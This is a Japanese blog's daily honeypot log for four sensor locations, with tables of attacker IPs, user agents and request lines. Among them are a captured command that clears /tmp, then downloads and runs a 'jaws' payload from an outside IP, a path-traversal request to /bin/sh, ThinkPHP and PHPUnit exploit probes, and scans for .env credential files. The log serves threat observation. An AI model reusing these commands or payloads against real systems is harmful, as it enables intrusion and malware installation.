コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2023/04/19 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2023/04/19分です。

特徴
共通

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
Telerik UIの脆弱性(CVE-2019-18935)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
/.envへのスキャン行為
/.gitへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為

Location:JP

Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 94.158.247.123/jaws;
sh /tmp/jaws
Location:US

D-link製品の脆弱性を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
CensysInspectによるスキャン行為
Gh0stRATのような動き

を確認しました。

Location:UK

PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
CensysInspectによるスキャン行為
Apache Tomcatへのスキャン行為
UserAgentがHello, Worldであるアクセス

を確認しました。

Location:SG

D-link製品の脆弱性を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
CensysInspectによるスキャン行為
Apache Tomcatへのスキャン行為
WordPress Pluginへのスキャン行為

を確認しました。

アクセス数推移

JP:総アクセス数:239 (前日比:102)
US:総アクセス数:113 (前日比:31)
UK:総アクセス数:127 (前日比:-21)
SG:総アクセス数:281 (前日比:163)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
71 20.10.187.178 United States
3 20.55.58.5 United States
1 27.124.12.9 Singapore
1 34.221.38.253 United States
11 34.239.159.28 United States
1 35.205.33.103 United States
1 35.240.13.219 United States
19 43.154.141.71 Singapore
1 45.56.108.128 United States
3 45.79.172.21 United States
2 45.79.181.94 United States
1 45.79.181.223 United States
1 60.221.61.247 China
4 62.210.207.17 France
1 95.211.230.179 Netherlands
1 104.192.0.50 United States
1 116.131.53.98 China
7 135.125.246.110 France
9 135.125.246.189 France
1 151.241.74.85 Iran
10 152.89.196.54 Russia
1 162.221.192.26 United States
1 162.243.131.17 United States
2 165.22.60.26 United States
6 165.154.119.27 Hong Kong
1 165.154.134.208 Hong Kong
2 167.99.13.19 United States
1 172.104.11.4 United States
1 172.104.11.46 United States
1 172.105.128.12 United States
41 175.178.237.54 China
1 182.126.119.58 China
12 185.181.8.126 Gibraltar
6 185.254.196.173 Ukraine
1 192.155.90.220 United States
8 193.32.162.159 Romania
1 198.235.24.149 United States
1 205.210.31.28 United States
2 216.218.206.67 United States

UserAgent一覧

件数 UserAgent
75 -
1 Go-http-client/1.1
2 Hello, world
70 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 8_0_2) AppleWebKit/563.42 (KHTML, like Gecko) Chrome/92.0.2181 Safari/537.36
3 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
19 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
6 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
10 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
1 Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0
1 Mozilla/5.0 (Windows NT 7_2_1; Win64; x64) AppleWebKit/579.52 (KHTML, like Gecko) Chrome/103.0.1273 Safari/537.36
1 Mozilla/5.0 (Windows NT 7_2_2; Win64; x64) AppleWebKit/575.36 (KHTML, like Gecko) Chrome/75.0.2699 Safari/537.36
26 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5362a Safari/604.1
1 Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1
5 Mozilla/5.0 zgrab/0.x
1 python-requests/2.25.1
1 python-requests/2.28.1

リクエスト内容一覧

件数 Method Request Protocol
1 -
20 \x16\x03\x01
1 GET /%20-%20.env HTTP/1.1
1 GET /%20-%20Copy.env HTTP/1.1
1 GET /%21.env HTTP/1.1
1 GET /-%20Copy.env HTTP/1.1
1 GET /.env.development HTTP/1.1
1 GET /.env.dist HTTP/1.1
1 GET /.env.old HTTP/1.1
1 GET /.env.prod HTTP/1.1
1 GET /.env.production HTTP/1.1
1 GET /.env.project HTTP/1.1
1 GET /.env.save HTTP/1.1
28 GET /.env HTTP/1.1
2 GET /.git/config HTTP/1.1
1 GET /.json HTTP/1.1
1 GET /99vt HTTP/1.1
1 GET /99vu HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /?phpinfo=1 HTTP/1.1
1 GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /_profiler/phpinfo HTTP/1.1
2 GET /aaa9 HTTP/1.1
1 GET /aaaaaaaaaaaaaaaaaaaaaaaaaqr HTTP/1.1
2 GET /aab8 HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /admin-app/.env HTTP/1.1
1 GET /api/.env HTTP/1.1
2 GET /app/.env HTTP/1.1
1 GET /application/.env HTTP/1.1
1 GET /apps/.env HTTP/1.1
1 GET /axis2-admin/ HTTP/1.1
1 GET /axis2/ HTTP/1.1
1 GET /axis2/axis2-admin/ HTTP/1.1
1 GET /back/.env HTTP/1.1
1 GET /blob/.env HTTP/1.1
1 GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0
1 GET /cms/.env HTTP/1.1
1 GET /config.json HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /core/.env HTTP/1.1
1 GET /cp/.env HTTP/1.1
1 GET /debug/default/view?panel=config HTTP/1.1
1 GET /development/.env HTTP/1.1
8 GET /dispatch.asp HTTP/1.1
1 GET /dist/index.html?v=82ba4a HTTP/1.1
1 GET /docker/.env HTTP/1.1
1 GET /enviroments/.env.production HTTP/1.1
1 GET /enviroments/.env HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /fedex/.env HTTP/1.1
1 GET /frontend_dev.php/$ HTTP/1.1
1 GET /gate.php HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /geoserver HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /index/about/index.html HTTP/1.1
1 GET /info.php HTTP/1.1
2 GET /laravel/.env HTTP/1.1
1 GET /live_env HTTP/1.1
1 GET /local/.env HTTP/1.1
1 GET /maintenances HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /phpinfo.php HTTP/1.1
1 GET /private/.env HTTP/1.1
1 GET /prod/.env HTTP/1.1
1 GET /pub/ HTTP/1.1
1 GET /pub/god/ HTTP/1.1
1 GET /rest/.env HTTP/1.1
3 GET /robots.txt HTTP/1.1
1 GET /script/.env HTTP/1.1
1 GET /sendgrid.env HTTP/1.1
1 GET /shared/.env HTTP/1.1
2 GET /shell?cd+/tmp;rm+-rf+*;wget+94[.]158[.]247[.]123/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /sources/.env HTTP/1.1
1 GET /system/.env HTTP/1.1
1 GET /systembc/password.php HTTP/1.0
1 GET /tywcb/161343.html HTTP/1.1
1 GET /v3/time HTTP/1.1
1 GET /vendor/laravel/.env HTTP/1.1
1 GET http[:]//18[.]179[.]20[.]5:80/MyAdmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/PHPMYADMIN/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/_phpMyAdmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/admin/pma/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/admin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/db/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/dbadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/myadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/mysql-admin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/mysql/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/mysqladmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/mysqlmanager/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/php-myadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/php/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin2/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin3/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpma/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpmy-admin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpmyadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/pma/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/sqlmanager/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/sqlweb/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/webadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/webdb/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/websql/scripts/setup.php HTTP/1.0
19 HEAD /Core/Skin/Login.aspx HTTP/1.1
1 POST /.env.development HTTP/1.1
1 POST /.env.dist HTTP/1.1
1 POST /.env.old HTTP/1.1
1 POST /.env.prod HTTP/1.1
1 POST /.env.production HTTP/1.1
1 POST /.env.project HTTP/1.1
1 POST /.env.save HTTP/1.1
1 POST /.env HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /admin-app/.env HTTP/1.1
1 POST /api/.env HTTP/1.1
1 POST /app/.env HTTP/1.1
1 POST /application/.env HTTP/1.1
1 POST /apps/.env HTTP/1.1
1 POST /back/.env HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /cms/.env HTTP/1.1
1 POST /core/.env HTTP/1.1
1 POST /cp/.env HTTP/1.1
1 POST /development/.env HTTP/1.1
1 POST /docker/.env HTTP/1.1
1 POST /enviroments/.env.production HTTP/1.1
1 POST /enviroments/.env HTTP/1.1
1 POST /fedex/.env HTTP/1.1
1 POST /laravel/.env HTTP/1.1
1 POST /live_env HTTP/1.1
1 POST /local/.env HTTP/1.1
1 POST /private/.env HTTP/1.1
1 POST /rest/.env HTTP/1.1
1 POST /script/.env HTTP/1.1
1 POST /shared/.env HTTP/1.1
1 POST /sources/.env HTTP/1.1
1 POST /system/.env HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 15.237.44.137 United States
2 20.14.81.250 United States
4 20.55.58.5 United States
3 45.12.147.2 Cyprus
1 45.79.128.205 United States
2 45.79.181.179 United States
1 45.79.181.223 United States
1 45.79.181.251 United States
25 54.37.79.75 France
1 54.202.216.29 United States
1 64.62.197.233 United States
1 64.62.197.238 United States
2 64.227.146.243 United States
1 66.240.205.34 United States
1 91.223.227.140 Ukraine
9 95.214.235.216 Ukraine
1 104.155.76.153 United States
1 107.170.227.33 United States
1 117.196.25.127 India
1 128.14.133.58 United States
1 130.211.89.108 United States
1 134.122.133.97 Singapore
2 138.68.143.68 United States
12 152.89.196.54 Russia
1 159.203.240.9 United States
2 162.142.125.214 United States
2 167.248.133.33 United States
2 170.64.166.144 United States
3 172.104.11.34 United States
2 172.105.77.209 United States
1 172.105.128.12 United States
1 172.105.128.13 United States
1 179.43.177.243 Panama
1 183.136.225.32 China
1 183.136.225.42 China
3 192.155.90.118 United States
1 192.241.226.6 United States
10 193.32.162.159 Romania
2 193.35.18.32 Bulgaria
2 194.87.151.116 Czechia
1 198.235.24.85 United States
1 198.235.24.137 United States

UserAgent一覧

件数 UserAgent
23 -
3 Go-http-client/1.1
1 Mozila/5.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 OPR/94.0.0.0
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
12 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
10 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
2 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
39 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
4 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
1 Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1
8 Mozilla/5.0 zgrab/0.x
1 python-requests/2.25.1

リクエスト内容一覧

件数 Method Request Protocol
2 -
1 Gh0st\xad
1 MGLNDD_34.68.118.83_80\n
15 \x16\x03\x01
39 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /ReportServer HTTP/1.1
1 GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
3 GET /aaa9 HTTP/1.1
3 GET /aab8 HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0
1 GET /console/ HTTP/1.1
10 GET /dispatch.asp HTTP/1.1
5 GET /favicon.ico HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /geoserver HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /manager/text/list HTTP/1.1
1 GET /pub/ HTTP/1.1
1 GET /pub/god/ HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /tywcb/161343.html HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
3 GET http[:]//azenv[.]net/ HTTP/1.1
1 HEAD /.env HTTP/1.1
1 HEAD / HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /HNAP1/ HTTP/1.1
4 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 PRI * HTTP/2.0
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 5.181.86.250 Ukraine
1 35.164.240.104 United States
1 35.233.111.222 United States
1 35.240.89.39 United States
2 45.12.147.2 Cyprus
1 45.33.80.243 United States
3 45.79.172.21 United States
1 45.79.181.179 United States
25 54.37.79.75 France
7 64.225.22.11 United States
2 65.49.20.68 United States
7 68.183.204.64 United States
6 95.214.235.216 Ukraine
1 107.170.192.7 United States
1 107.170.251.10 United States
1 109.237.97.180 Russia
1 128.1.248.42 United States
1 134.122.184.35 Singapore
1 147.78.103.100 Bulgaria
12 152.89.196.54 Russia
4 162.142.125.121 United States
2 162.142.125.225 United States
3 172.104.11.4 United States
1 172.104.11.34 United States
1 172.104.11.46 United States
1 172.105.128.12 United States
1 172.105.128.13 United States
1 175.107.1.192 Pakistan
2 179.43.177.243 Panama
6 185.77.217.3 Russia
7 185.180.143.11 Portugal
1 192.241.203.6 United States
10 193.32.162.159 Romania
1 193.35.18.32 Bulgaria
1 193.35.18.119 Bulgaria
2 193.35.18.251 Bulgaria
1 194.87.151.116 Czechia
1 198.199.110.132 United States
1 198.235.24.33 United States
1 205.210.31.131 United States
3 212.87.204.23 Bulgaria

UserAgent一覧

件数 UserAgent
27 -
3 Go-http-client/1.1
1 Hello, World
6 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
6 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
12 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
10 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
33 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
6 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
3 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
1 Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1
3 Mozilla/5.0 zgrab/0.x
2 Mozilla/5.0
1 python-requests/2.25.1

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_132.145.66.34_80\n
1 SSH-2.0-libssh2_1.10.0
22 \x16\x03\x01
1 CONNECT google[.]com:443 HTTP/1.1
34 GET /.env HTTP/1.1
2 GET /.git/config HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /ReportServer HTTP/1.1
1 GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /_profiler/phpinfo HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /admin/ HTTP/1.1
2 GET /client/get_targets HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /debug/default/view?panel=config HTTP/1.1
10 GET /dispatch.asp HTTP/1.1
1 GET /donghuapian/baishe2qingshejieqi/ HTTP/1.1
6 GET /favicon.ico HTTP/1.1
2 GET /geoip/ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /geoserver HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /manager/text/list HTTP/1.1
1 GET /pub/ HTTP/1.1
1 GET /pub/god/ HTTP/1.1
1 GET /solr/ HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
2 GET /upl.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /webfig/ HTTP/1.1
2 GET http[:]//azenv[.]net/ HTTP/1.1
2 HEAD / HTTP/1.1
1 HEAD /config.json HTTP/1.1
1 HEAD /icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png HTTP/1.1
1 HEAD /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png HTTP/1.1
1 HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1
1 HEAD /icons/sphere1.png HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
6 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
3 PRI * HTTP/2.0
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
2 4.17.224.131 United States
2 4.17.224.133 United States
1 20.224.18.158 United States
1 34.140.198.19 United States
1 35.89.96.250 United States
3 45.12.147.2 Cyprus
2 45.33.80.243 United States
1 45.56.108.128 United States
1 45.79.128.205 United States
2 45.79.181.94 United States
1 45.79.181.104 United States
1 45.79.181.251 United States
29 51.79.29.48 Canada
2 63.214.171.26 United States
2 64.62.197.45 United States
4 93.160.62.190 Denmark
1 107.170.238.26 United States
2 115.78.10.124 Vietnam
1 128.14.134.170 United States
1 128.71.137.44 Russia
1 134.122.184.11 Singapore
1 137.184.74.35 United States
7 138.68.149.247 United States
12 152.89.196.54 Russia
2 162.142.125.11 United States
2 165.22.60.26 United States
2 167.94.146.57 United States
2 167.99.13.19 United States
1 172.104.11.34 United States
1 172.104.11.51 United States
1 172.105.128.13 United States
1 174.138.42.183 United States
1 176.118.160.24 Spain
1 179.43.177.243 Panama
1 180.115.161.64 China
4 185.142.236.43 Seychelles
4 190.213.155.143 Trinidad and Tobago
1 192.35.222.19 United States
1 192.142.226.151 United States
2 192.155.90.118 United States
1 192.241.231.15 United States
9 193.32.162.159 Romania
1 193.35.18.32 Bulgaria
3 194.87.151.116 Czechia
1 198.235.24.125 United States
151 202.149.70.60 Indonesia
1 205.210.31.153 United States
4 206.226.64.150 United States
2 216.163.200.22 United States

UserAgent一覧

件数 UserAgent
25 -
3 Go-http-client/1.1
2 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
3 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.41
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.57
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
12 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
9 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
1 Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
151 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
51 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
